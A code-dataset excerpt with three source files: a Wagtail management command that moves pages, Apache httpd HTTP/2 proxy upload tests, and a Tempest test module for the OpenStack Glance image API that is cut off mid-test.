UTF-8
|
Python
| false
| false
| 852
|
py
|
move_pages.py
|
from django.core.management.base import BaseCommand
from wagtail.models import Page
class Command(BaseCommand):
def add_arguments(self, parser):
# Positional arguments
parser.add_argument("from_id", type=int)
parser.add_argument("to_id", type=int)
def handle(self, *args, **options):
# Get pages
from_page = Page.objects.get(pk=options["from_id"])
to_page = Page.objects.get(pk=options["to_id"])
pages = from_page.get_children()
# Move the pages
self.stdout.write(
"Moving "
+ str(len(pages))
+ ' pages from "'
+ from_page.title
+ '" to "'
+ to_page.title
+ '"'
)
for page in pages:
page.move(to_page, pos="last-child")
self.stdout.write("Done")
|
fd40d91faaa35f9bac2dd4a4d152d5a51821e065
|
e8c76797b194bce6702adf9721a96c2b440efd5c
|
/test/modules/http2/test_601_h2proxy_twisted.py
|
60f5f7df5bfdf3081968c544f07aa530017fbfb0
|
[
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"Apache-2.0",
"LicenseRef-scancode-zeusbench",
"BSD-3-Clause",
"RSA-MD",
"LicenseRef-scancode-rsa-1990",
"Beerware",
"LicenseRef-scancode-other-permissive",
"Spencer-94",
"metamail",
"LicenseRef-scancode-rsa-md4",
"HPND-sell-variant"
] |
permissive
|
apache/httpd
|
86bfac3d6e2e9b48f5bfca5be7ec616fa9b14e9a
|
b9e029c8036fd036281ac266010db91aed6079b2
|
refs/heads/trunk
| 2023-09-04T07:18:59.681233
| 2023-08-30T12:56:11
| 2023-08-30T12:56:11
| 205,423
| 3,159
| 1,329
|
Apache-2.0
| 2023-09-11T13:50:41
| 2009-05-20T02:02:59
|
C
|
UTF-8
|
Python
| false
| false
| 4,028
|
py
|
test_601_h2proxy_twisted.py
|
import json
import logging
import os
import pytest
from .env import H2Conf, H2TestEnv
log = logging.getLogger(__name__)
@pytest.mark.skipif(condition=H2TestEnv.is_unsupported, reason="mod_http2 not supported here")
class TestH2ProxyTwisted:
@pytest.fixture(autouse=True, scope='class')
def _class_scope(self, env):
H2Conf(env).add_vhost_cgi(proxy_self=True, h2proxy_self=True).install()
assert env.apache_restart() == 0
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_01_echo_uploads(self, env, name):
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", "/h2proxy/h2test/echo")
r = env.curl_upload(url, fpath, options=[])
assert r.exit_code == 0
assert 200 <= r.response["status"] < 300
# we POST a form, so echoed input is larger than the file itself
assert len(r.response["body"]) > os.path.getsize(fpath)
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_02_echo_delayed(self, env, name):
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", "/h2proxy/h2test/echo?chunk_delay=10ms")
r = env.curl_upload(url, fpath, options=[])
assert r.exit_code == 0
assert 200 <= r.response["status"] < 300
# we POST a form, so echoed input is larger than the file itself
assert len(r.response["body"]) > os.path.getsize(fpath)
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_03_echo_fail_early(self, env, name):
if not env.httpd_is_at_least('2.4.58'):
pytest.skip(f'needs httpd 2.4.58')
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", "/h2proxy/h2test/echo?fail_after=512")
r = env.curl_upload(url, fpath, options=[])
# 92 is curl's CURLE_HTTP2_STREAM
assert r.exit_code == 92 or r.response["status"] == 502
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_04_echo_fail_late(self, env, name):
if not env.httpd_is_at_least('2.4.58'):
pytest.skip(f'needs httpd 2.4.58')
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", f"/h2proxy/h2test/echo?fail_after={os.path.getsize(fpath)}")
r = env.curl_upload(url, fpath, options=[])
# 92 is curl's CURLE_HTTP2_STREAM
if r.exit_code != 0:
# H2 stream or partial file error
assert r.exit_code == 92 or r.exit_code == 18, f'{r}'
else:
assert r.response["status"] == 502, f'{r}'
def test_h2_601_05_echo_fail_many(self, env):
if not env.httpd_is_at_least('2.4.58'):
pytest.skip(f'needs httpd 2.4.58')
if not env.curl_is_at_least('8.0.0'):
pytest.skip(f'need at least curl v8.0.0 for this')
count = 200
fpath = os.path.join(env.gen_dir, "data-100k")
args = [env.curl, '--parallel', '--parallel-max', '20']
for i in range(count):
if i > 0:
args.append('--next')
url = env.mkurl("https", "cgi", f"/h2proxy/h2test/echo?id={i}&fail_after={os.path.getsize(fpath)}")
args.extend(env.curl_resolve_args(url=url))
args.extend([
'-o', '/dev/null', '-w', '%{json}\\n', '--form', f'file=@{fpath}', url
])
log.error(f'run: {args}')
r = env.run(args)
stats = []
for line in r.stdout.splitlines():
stats.append(json.loads(line))
assert len(stats) == count
for st in stats:
if st['exitcode'] != 0:
# H2 stream or partial file error
assert st['exitcode'] == 92 or st['exitcode'] == 18, f'{r}'
else:
assert st['http_code'] == 502, f'{r}'
|
dabd728ac22e8f258a09659a33cc2f1e1c198ac7
|
8f267fe1157904023004aa1fcee8cdcaf1d69f74
|
/tempest/api/image/v2/test_images.py
|
977ad82d95616c4a0aab195d8cc1cadc81767180
|
[
"Apache-2.0"
] |
permissive
|
openstack/tempest
|
a65737f3e62d4ebeb7e387feac7bcc636d3f5fe0
|
3932a799e620a20d7abf7b89e21b520683a1809b
|
refs/heads/master
| 2023-08-28T15:04:21.241805
| 2023-08-28T10:16:57
| 2023-08-28T10:16:57
| 2,356,406
| 270
| 407
|
Apache-2.0
| 2022-06-29T15:52:45
| 2011-09-09T15:56:02
|
Python
|
UTF-8
|
Python
| false
| false
| 43,927
|
py
|
test_images.py
|
# Copyright 2013 OpenStack Foundation
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import io
import random
from oslo_log import log as logging
from tempest.api.image import base
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
CONF = config.CONF
LOG = logging.getLogger(__name__)
class ImportImagesTest(base.BaseV2ImageTest):
"""Here we test the import operations for image"""
@classmethod
def skip_checks(cls):
super(ImportImagesTest, cls).skip_checks()
if not CONF.image_feature_enabled.import_image:
skip_msg = (
"%s skipped as image import is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def resource_setup(cls):
super(ImportImagesTest, cls).resource_setup()
cls.available_import_methods = cls.client.info_import()[
'import-methods']['value']
if not cls.available_import_methods:
raise cls.skipException('Server does not support '
'any import method')
def _create_image(self, disk_format=None, container_format=None):
# Create image
uuid = '00000000-1111-2222-3333-444455556666'
image_name = data_utils.rand_name('image')
container_format = container_format or CONF.image.container_formats[0]
disk_format = disk_format or CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private',
ramdisk_id=uuid)
self.assertIn('name', image)
self.assertEqual(image_name, image['name'])
self.assertIn('visibility', image)
self.assertEqual('private', image['visibility'])
self.assertIn('status', image)
self.assertEqual('queued', image['status'])
return image
def _require_import_method(self, method):
if method not in self.available_import_methods:
raise self.skipException('Server does not support '
'%s import method' % method)
def _stage_and_check(self):
image = self._create_image()
# Stage image data
file_content = data_utils.random_bytes()
image_file = io.BytesIO(file_content)
self.client.stage_image_file(image['id'], image_file)
# Check image status is 'uploading'
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual('uploading', body['status'])
return image['id']
@decorators.idempotent_id('32ca0c20-e16f-44ac-8590-07869c9b4cc2')
def test_image_glance_direct_import(self):
"""Test 'glance-direct' import functionalities
Create image, stage image data, import image and verify
that import succeeded.
"""
self._require_import_method('glance-direct')
image_id = self._stage_and_check()
# import image from staging to backend
resp = self.client.image_import(image_id, method='glance-direct')
waiters.wait_for_image_imported_to_stores(self.client, image_id)
if not self.versions_client.has_version('2.12'):
# API is not new enough to support image/tasks API
LOG.info('Glance does not support v2.12, so I am unable to '
'validate the image/tasks API.')
return
tasks = waiters.wait_for_image_tasks_status(
self.client, image_id, 'success')
self.assertEqual(1, len(tasks))
task = tasks[0]
self.assertEqual(resp.response['x-openstack-request-id'],
task['request_id'])
self.assertEqual('glance-direct',
task['input']['import_req']['method']['name'])
@decorators.idempotent_id('f6feb7a4-b04f-4706-a011-206129f83e62')
def test_image_web_download_import(self):
"""Test 'web-download' import functionalities
Create image, import image and verify that import
succeeded.
"""
self._require_import_method('web-download')
image = self._create_image()
# Now try to get image details
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual('queued', body['status'])
# import image from web to backend
image_uri = CONF.image.http_image
self.client.image_import(image['id'], method='web-download',
import_params={'uri': image_uri})
waiters.wait_for_image_imported_to_stores(self.client, image['id'])
@decorators.idempotent_id('8876c818-c40e-4b90-9742-31d231616305')
def test_image_glance_download_import_success(self):
# We use glance-direct initially, then glance-download for test
self._require_import_method('glance-direct')
self._require_import_method('glance-download')
# Create an image via the normal import process to be our source
src = self._stage_and_check()
self.client.image_import(src, method='glance-direct')
waiters.wait_for_image_imported_to_stores(self.client, src)
# Add some properties to it that will be copied by the default
# config (and one that won't)
self.client.update_image(src, [
{'add': '/hw_cpu_cores', 'value': '5'},
{'add': '/trait:STORAGE_DISK_SSD', 'value': 'required'},
{'add': '/os_distro', 'value': 'rhel'},
{'add': '/speed', 'value': '88mph'},
])
# Make sure our properties stuck on the source image
src_image = self.client.show_image(src)
self.assertEqual('5', src_image['hw_cpu_cores'])
self.assertEqual('required', src_image['trait:STORAGE_DISK_SSD'])
self.assertEqual('rhel', src_image['os_distro'])
self.assertEqual('88mph', src_image['speed'])
# Create a new image which we will fill from another glance image
dst = self._create_image(container_format='ovf',
disk_format='iso')['id']
# Set some values that will conflict to make sure we get the
# new ones and confirm they stuck before the import.
self.client.update_image(dst, [
{'add': '/hw_cpu_cores', 'value': '1'},
{'add': '/os_distro', 'value': 'windows'},
])
dst_image = self.client.show_image(dst)
self.assertEqual('1', dst_image['hw_cpu_cores'])
self.assertEqual('windows', dst_image['os_distro'])
params = {
'glance_image_id': src,
'glance_region': self.client.region,
'glance_service_interface': 'public',
}
self.client.image_import(dst, method='glance-download',
import_params=params)
waiters.wait_for_image_tasks_status(self.client, dst, 'success')
# Make sure the new image has all the keys imported from the
# original image that we expect
dst_image = self.client.show_image(dst)
self.assertEqual(src_image['disk_format'], dst_image['disk_format'])
self.assertEqual(src_image['container_format'],
dst_image['container_format'])
self.assertEqual('5', dst_image['hw_cpu_cores'])
self.assertEqual('required', dst_image['trait:STORAGE_DISK_SSD'])
self.assertEqual('rhel', dst_image['os_distro'])
self.assertNotIn('speed', dst_image)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('36d4b546-64a2-4bb9-bdd0-ba676aa48f2c')
def test_image_glance_download_import_bad_uuid(self):
self._require_import_method('glance-download')
image_id = self._create_image()['id']
params = {
'glance_image_id': 'foo',
'glance_region': self.client.region,
'glance_service_interface': 'public',
}
# A non-UUID-like image id should make us fail immediately
e = self.assertRaises(lib_exc.BadRequest,
self.client.image_import,
image_id, method='glance-download',
import_params=params)
self.assertIn('image id does not look like a UUID', str(e))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('77644240-dbbe-4744-ae28-09b2ac12e218')
def test_image_glance_download_import_bad_endpoint(self):
self._require_import_method('glance-download')
image_id = self._create_image()['id']
# Set some properties before the import to make sure they are
# undisturbed
self.client.update_image(image_id, [
{'add': '/hw_cpu_cores', 'value': '1'},
{'add': '/os_distro', 'value': 'windows'},
])
image = self.client.show_image(image_id)
self.assertEqual('1', image['hw_cpu_cores'])
self.assertEqual('windows', image['os_distro'])
params = {
'glance_image_id': '36d4b546-64a2-4bb9-bdd0-ba676aa48f2c',
'glance_region': 'not a region',
'glance_service_interface': 'not an interface',
}
# A bad region or interface will cause us to fail when we
# contact the remote glance.
self.client.image_import(image_id, method='glance-download',
import_params=params)
waiters.wait_for_image_tasks_status(self.client, image_id, 'failure')
# Make sure we reverted the image status to queued on failure, and that
# our extra properties are still in place.
image = self.client.show_image(image_id)
self.assertEqual('queued', image['status'])
self.assertEqual('1', image['hw_cpu_cores'])
self.assertEqual('windows', image['os_distro'])
@decorators.attr(type=['negative'])
@decorators.idempotent_id('c7edec8e-24b5-416a-9d42-b3e773bab62c')
def test_image_glance_download_import_bad_missing_image(self):
self._require_import_method('glance-download')
image_id = self._create_image()['id']
params = {
'glance_image_id': '36d4b546-64a2-4bb9-bdd0-ba676aa48f2c',
'glance_region': self.client.region,
'glance_service_interface': 'public',
}
# A non-existent image will cause us to fail when we
# contact the remote glance.
self.client.image_import(image_id, method='glance-download',
import_params=params)
waiters.wait_for_image_tasks_status(self.client, image_id, 'failure')
# Make sure we reverted the image status to queued on failure
image = self.client.show_image(image_id)
self.assertEqual('queued', image['status'])
@decorators.idempotent_id('e04761a1-22af-42c2-b8bc-a34a3f12b585')
def test_remote_import(self):
"""Test image import against a different worker than stage.
This creates and stages an image against the primary API worker,
but then calls import on a secondary worker (if available) to
test that distributed image import works (i.e. proxies the import
request to the proper worker).
"""
self._require_import_method('glance-direct')
if not CONF.image.alternate_image_endpoint:
raise self.skipException('No image_remote service to test '
'against')
image_id = self._stage_and_check()
# import image from staging to backend, but on the alternate worker
self.os_primary.image_client_remote.image_import(
image_id, method='glance-direct')
waiters.wait_for_image_imported_to_stores(self.client, image_id)
@decorators.idempotent_id('44d60544-1524-42f7-8899-315301105dd8')
def test_remote_delete(self):
"""Test image delete against a different worker than stage.
This creates and stages an image against the primary API worker,
but then calls delete on a secondary worker (if available) to
test that distributed image import works (i.e. proxies the delete
request to the proper worker).
"""
self._require_import_method('glance-direct')
if not CONF.image.alternate_image_endpoint:
raise self.skipException('No image_remote service to test '
'against')
image_id = self._stage_and_check()
# delete image from staging to backend, but on the alternate worker
self.os_primary.image_client_remote.delete_image(image_id)
self.client.wait_for_resource_deletion(image_id)
class MultiStoresImportImagesTest(base.BaseV2ImageTest):
"""Test importing image in multiple stores"""
@classmethod
def skip_checks(cls):
super(MultiStoresImportImagesTest, cls).skip_checks()
if not CONF.image_feature_enabled.import_image:
skip_msg = (
"%s skipped as image import is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def resource_setup(cls):
super(MultiStoresImportImagesTest, cls).resource_setup()
cls.available_import_methods = cls.client.info_import()[
'import-methods']['value']
if not cls.available_import_methods:
raise cls.skipException('Server does not support '
'any import method')
# NOTE(pdeore): Skip if glance-direct import method and mutlistore
# are not enabled/configured, or only one store is configured in
# multiple stores setup.
cls.available_stores = cls.get_available_stores()
if ('glance-direct' not in cls.available_import_methods or
not len(cls.available_stores) > 1):
raise cls.skipException(
'Either glance-direct import method not present in %s or '
'None or only one store is '
'configured %s' % (cls.available_import_methods,
cls.available_stores))
def _create_and_stage_image(self, all_stores=False):
"""Create Image & stage image file for glance-direct import method."""
image_name = data_utils.rand_name('test-image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
self.assertEqual('queued', image['status'])
self.client.stage_image_file(
image['id'],
io.BytesIO(data_utils.random_bytes()))
# Check image status is 'uploading'
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual('uploading', body['status'])
if all_stores:
stores_list = ','.join([store['id']
for store in self.available_stores
if store.get('read-only') != 'true'])
else:
stores = [store['id'] for store in self.available_stores
if store.get('read-only') != 'true']
stores_list = stores[::max(1, len(stores) - 1)]
return body, stores_list
@decorators.idempotent_id('bf04ff00-3182-47cb-833a-f1c6767b47fd')
def test_glance_direct_import_image_to_all_stores(self):
"""Test image is imported in all available stores
Create image, import image to all available stores using glance-direct
import method and verify that import succeeded.
"""
image, stores = self._create_and_stage_image(all_stores=True)
self.client.image_import(
image['id'], method='glance-direct', all_stores=True)
waiters.wait_for_image_imported_to_stores(self.client,
image['id'], stores)
@decorators.idempotent_id('82fb131a-dd2b-11ea-aec7-340286b6c574')
def test_glance_direct_import_image_to_specific_stores(self):
"""Test image is imported in all available stores
Create image, import image to specified store(s) using glance-direct
import method and verify that import succeeded.
"""
image, stores = self._create_and_stage_image()
self.client.image_import(image['id'], method='glance-direct',
stores=stores)
waiters.wait_for_image_imported_to_stores(self.client, image['id'],
(','.join(stores)))
class BasicOperationsImagesTest(base.BaseV2ImageTest):
"""Here we test the basic operations of images"""
@decorators.attr(type='smoke')
@decorators.idempotent_id('139b765e-7f3d-4b3d-8b37-3ca3876ee318')
def test_register_upload_get_image_file(self):
"""Here we test these functionalities
Register image, upload the image file, get image and get image
file api's
"""
uuid = '00000000-1111-2222-3333-444455556666'
image_name = data_utils.rand_name('image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private',
ramdisk_id=uuid)
self.assertIn('name', image)
self.assertEqual(image_name, image['name'])
self.assertIn('visibility', image)
self.assertEqual('private', image['visibility'])
self.assertIn('status', image)
self.assertEqual('queued', image['status'])
# NOTE: This Glance API returns different status codes for image
# condition. In this empty data case, Glance should return 204,
# so here should check the status code.
image_file = self.client.show_image_file(image['id'])
self.assertEqual(0, len(image_file.data))
self.assertEqual(204, image_file.response.status)
# Now try uploading an image file
file_content = data_utils.random_bytes()
image_file = io.BytesIO(file_content)
self.client.store_image_file(image['id'], image_file)
# Now try to get image details
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual(image_name, body['name'])
self.assertEqual(uuid, body['ramdisk_id'])
self.assertIn('size', body)
self.assertEqual(1024, body.get('size'))
# Now try get image file
# NOTE: This Glance API returns different status codes for image
# condition. In this non-empty data case, Glance should return 200,
# so here should check the status code.
body = self.client.show_image_file(image['id'])
self.assertEqual(file_content, body.data)
self.assertEqual(200, body.response.status)
@decorators.attr(type='smoke')
@decorators.idempotent_id('f848bb94-1c6e-45a4-8726-39e3a5b23535')
def test_delete_image(self):
"""Test deleting an image by image_id"""
# Create image
image_name = data_utils.rand_name('image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
# Delete Image
self.client.delete_image(image['id'])
self.client.wait_for_resource_deletion(image['id'])
# Verifying deletion
images = self.client.list_images()['images']
images_id = [item['id'] for item in images]
self.assertNotIn(image['id'], images_id)
@decorators.attr(type='smoke')
@decorators.idempotent_id('f66891a7-a35c-41a8-b590-a065c2a1caa6')
def test_update_image(self):
"""Test updating an image by image_id"""
# Create image
image_name = data_utils.rand_name('image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
self.assertEqual('queued', image['status'])
# Update Image
new_image_name = data_utils.rand_name('new-image')
self.client.update_image(image['id'], [
dict(replace='/name', value=new_image_name)])
# Verifying updating
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual(new_image_name, body['name'])
@decorators.idempotent_id('951ebe01-969f-4ea9-9898-8a3f1f442ab0')
def test_deactivate_reactivate_image(self):
"""Test deactivating and reactivating an image"""
# Create image
image_name = data_utils.rand_name('image')
image = self.create_image(name=image_name,
container_format='bare',
disk_format='raw',
visibility='private')
# Upload an image file
content = data_utils.random_bytes()
image_file = io.BytesIO(content)
self.client.store_image_file(image['id'], image_file)
# Deactivate image
self.client.deactivate_image(image['id'])
body = self.client.show_image(image['id'])
self.assertEqual("deactivated", body['status'])
# User unable to download deactivated image
self.assertRaises(lib_exc.Forbidden, self.client.show_image_file,
image['id'])
# Reactivate image
self.client.reactivate_image(image['id'])
body = self.client.show_image(image['id'])
self.assertEqual("active", body['status'])
# User able to download image after reactivation
body = self.client.show_image_file(image['id'])
self.assertEqual(content, body.data)
class ListUserImagesTest(base.BaseV2ImageTest):
"""Here we test the listing of image information"""
@classmethod
def resource_setup(cls):
super(ListUserImagesTest, cls).resource_setup()
# We add a few images here to test the listing functionality of
# the images API
container_fmts = CONF.image.container_formats
disk_fmts = CONF.image.disk_formats
all_pairs = [(container_fmt, disk_fmt)
for container_fmt in container_fmts
for disk_fmt in disk_fmts]
for (container_fmt, disk_fmt) in all_pairs[:6]:
LOG.debug("Creating an image "
"(Container format: %s, Disk format: %s).",
container_fmt, disk_fmt)
cls._create_standard_image(container_fmt, disk_fmt)
@classmethod
def _create_standard_image(cls, container_format, disk_format):
"""Create a new standard image and return the newly-registered image-id
Note that the size of the new image is a random number between
1024 and 4096
"""
size = random.randint(1024, 4096)
image_file = io.BytesIO(data_utils.random_bytes(size))
tags = [data_utils.rand_name('tag'), data_utils.rand_name('tag')]
image = cls.create_image(container_format=container_format,
disk_format=disk_format,
visibility='private',
tags=tags)
cls.client.store_image_file(image['id'], data=image_file)
# Keep the data of one test image so it can be used to filter lists
cls.test_data = image
return image['id']
def _list_by_param_value_and_assert(self, params):
"""Perform list action with given params and validates result."""
# Retrieve the list of images that meet the filter
images_list = self.client.list_images(params=params)['images']
# Validating params of fetched images
msg = 'No images were found that met the filter criteria.'
self.assertNotEmpty(images_list, msg)
for image in images_list:
for key in params:
msg = "Failed to list images by %s" % key
self.assertEqual(params[key], image[key], msg)
def _list_sorted_by_image_size_and_assert(self, params, desc=False):
"""Validate an image list that has been sorted by size
Perform list action with given params and validates the results are
sorted by image size in either ascending or descending order.
"""
# Retrieve the list of images that meet the filter
images_list = self.client.list_images(params=params)['images']
# Validate that the list was fetched sorted accordingly
msg = 'No images were found that met the filter criteria.'
self.assertNotEmpty(images_list, msg)
sorted_list = [image['size'] for image in images_list
if image['size'] is not None]
msg = 'The list of images was not sorted correctly.'
self.assertEqual(sorted(sorted_list, reverse=desc), sorted_list, msg)
@decorators.idempotent_id('1e341d7a-90a9-494c-b143-2cdf2aeb6aee')
def test_list_no_params(self):
"""Simple test to see all fixture images returned"""
images_list = self.client.list_images()['images']
image_list = [image['id'] for image in images_list]
for image in self.created_images:
self.assertIn(image, image_list)
@decorators.idempotent_id('9959ca1d-1aa7-4b7a-a1ea-0fff0499b37e')
def test_list_images_param_container_format(self):
"""Test to get all images with a specific container_format"""
params = {"container_format": self.test_data['container_format']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('4a4735a7-f22f-49b6-b0d9-66e1ef7453eb')
def test_list_images_param_disk_format(self):
"""Test to get all images with disk_format = raw"""
params = {"disk_format": "raw"}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('7a95bb92-d99e-4b12-9718-7bc6ab73e6d2')
def test_list_images_param_visibility(self):
"""Test to get all images with visibility = private"""
params = {"visibility": "private"}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('cf1b9a48-8340-480e-af7b-fe7e17690876')
def test_list_images_param_size(self):
"""Test to get all images by size"""
image_id = self.created_images[0]
# Get image metadata
image = self.client.show_image(image_id)
params = {"size": image['size']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('4ad8c157-971a-4ba8-aa84-ed61154b1e7f')
def test_list_images_param_min_max_size(self):
"""Test to get all images with min size and max size"""
image_id = self.created_images[0]
# Get image metadata
image = self.client.show_image(image_id)
size = image['size']
params = {"size_min": size - 500, "size_max": size + 500}
images_list = self.client.list_images(params=params)['images']
image_size_list = map(lambda x: x['size'], images_list)
for image_size in image_size_list:
self.assertGreaterEqual(image_size, params['size_min'],
"Failed to get images by size_min")
self.assertLessEqual(image_size, params['size_max'],
"Failed to get images by size_max")
@decorators.idempotent_id('7fc9e369-0f58-4d05-9aa5-0969e2d59d15')
def test_list_images_param_status(self):
"""Test to get all active images"""
params = {"status": "active"}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('e914a891-3cc8-4b40-ad32-e0a39ffbddbb')
def test_list_images_param_limit(self):
"""Test to get images by limit"""
params = {"limit": 1}
images_list = self.client.list_images(params=params)['images']
self.assertEqual(len(images_list), params['limit'],
"Failed to get images by limit")
@decorators.idempotent_id('e9a44b91-31c8-4b40-a332-e0a39ffb4dbb')
def test_list_image_param_owner(self):
"""Test to get images by owner"""
image_id = self.created_images[0]
# Get image metadata
image = self.client.show_image(image_id)
params = {"owner": image['owner']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('55c8f5f5-bfed-409d-a6d5-4caeda985d7b')
def test_list_images_param_name(self):
"""Test to get images by name"""
params = {'name': self.test_data['name']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('aa8ac4df-cff9-418b-8d0f-dd9c67b072c9')
def test_list_images_param_tag(self):
"""Test to get images matching a tag"""
params = {'tag': self.test_data['tags'][0]}
images_list = self.client.list_images(params=params)['images']
# Validating properties of fetched images
self.assertNotEmpty(images_list)
for image in images_list:
msg = ("The image {image_name} does not have the expected tag "
"{expected_tag} among its tags: {observerd_tags}."
.format(image_name=image['name'],
expected_tag=self.test_data['tags'][0],
observerd_tags=image['tags']))
self.assertIn(self.test_data['tags'][0], image['tags'], msg)
@decorators.idempotent_id('eeadce49-04e0-43b7-aec7-52535d903e7a')
def test_list_images_param_sort(self):
"""Test listing images sorting in descending order"""
params = {'sort': 'size:desc'}
self._list_sorted_by_image_size_and_assert(params, desc=True)
@decorators.idempotent_id('9faaa0c2-c3a5-43e1-8f61-61c54b409a49')
def test_list_images_param_sort_key_dir(self):
"""Test listing images sorting by size in descending order"""
params = {'sort_key': 'size', 'sort_dir': 'desc'}
self._list_sorted_by_image_size_and_assert(params, desc=True)
@decorators.idempotent_id('622b925c-479f-4736-860d-adeaf13bc371')
def test_get_image_schema(self):
"""Test to get image schema"""
schema = "image"
body = self.schemas_client.show_schema(schema)
self.assertEqual("image", body['name'])
@decorators.idempotent_id('25c8d7b2-df21-460f-87ac-93130bcdc684')
def test_get_images_schema(self):
"""Test to get images schema"""
schema = "images"
body = self.schemas_client.show_schema(schema)
self.assertEqual("images", body['name'])
@decorators.idempotent_id('d43f3efc-da4c-4af9-b636-868f0c6acedb')
def test_list_hidden_image(self):
image = self.client.create_image(os_hidden=True)
image = image['image'] if 'image' in image else image
self.addCleanup(self.client.wait_for_resource_deletion, image['id'])
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
self.client.delete_image, image['id'])
images_list = self.client.list_images()['images']
fetched_images_id = [img['id'] for img in images_list]
self.assertNotIn(image['id'], fetched_images_id)
@decorators.idempotent_id('fdb96b81-257b-42ac-978b-ddeefa3760e4')
def test_list_update_hidden_image(self):
image = self.create_image()
images_list = self.client.list_images()['images']
fetched_images_id = [img['id'] for img in images_list]
self.assertIn(image['id'], fetched_images_id)
self.client.update_image(image['id'],
[dict(replace='/os_hidden', value=True)])
images_list = self.client.list_images()['images']
fetched_images_id = [img['id'] for img in images_list]
self.assertNotIn(image['id'], fetched_images_id)
class ListSharedImagesTest(base.BaseV2ImageTest):
"""Here we test the listing of a shared image information"""
credentials = ['primary', 'alt']
@classmethod
def setup_clients(cls):
super(ListSharedImagesTest, cls).setup_clients()
cls.image_member_client = cls.os_primary.image_member_client_v2
cls.alt_img_client = cls.os_alt.image_client_v2
@decorators.idempotent_id('3fa50be4-8e38-4c02-a8db-7811bb780122')
def test_list_images_param_member_status(self):
"""Test listing images by member_status and visibility"""
# Create an image to be shared using default visibility
image_file = io.BytesIO(data_utils.random_bytes(2048))
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(container_format=container_format,
disk_format=disk_format)
self.client.store_image_file(image['id'], data=image_file)
# Share the image created with the alt user
self.image_member_client.create_image_member(
image_id=image['id'], member=self.alt_img_client.tenant_id)
# As an image consumer you need to provide the member_status parameter
# along with the visibility=shared parameter in order for it to show
# results
params = {'member_status': 'pending', 'visibility': 'shared'}
fetched_images = self.alt_img_client.list_images(params)['images']
self.assertEqual(1, len(fetched_images))
self.assertEqual(image['id'], fetched_images[0]['id'])
class ImageLocationsTest(base.BaseV2ImageTest):
@classmethod
def skip_checks(cls):
super(ImageLocationsTest, cls).skip_checks()
if not CONF.image_feature_enabled.manage_locations:
skip_msg = (
"%s skipped as show_multiple_locations is not available" % (
cls.__name__))
raise cls.skipException(skip_msg)
@decorators.idempotent_id('58b0fadc-219d-40e1-b159-1c902cec323a')
def test_location_after_upload(self):
image = self.client.create_image(container_format='bare',
disk_format='raw')
# Locations should be empty when there is no data
self.assertEqual('queued', image['status'])
self.assertEqual([], image['locations'])
# Now try uploading an image file
file_content = data_utils.random_bytes()
image_file = io.BytesIO(file_content)
self.client.store_image_file(image['id'], image_file)
waiters.wait_for_image_status(self.client, image['id'], 'active')
# Locations should now have one item
image = self.client.show_image(image['id'])
self.assertEqual(1, len(image['locations']),
'Expected one location in %r' % image['locations'])
# NOTE(danms): If show_image_direct_url is enabled, then this
# will be present. If so, it should match the one location we set
if 'direct_url' in image:
self.assertEqual(image['direct_url'], image['locations'][0]['url'])
return image
@decorators.idempotent_id('37599b8a-d5c0-4590-aee5-73878502be15')
def test_set_location(self):
self.check_set_location()
@decorators.idempotent_id('bf6e0009-c039-4884-b498-db074caadb10')
def test_replace_location(self):
image = self.check_set_multiple_locations()
original_locs = image['locations']
# Replacing with the exact thing should work
self.client.update_image(image['id'], [
dict(replace='/locations', value=image['locations'])])
# Changing metadata on a location should work
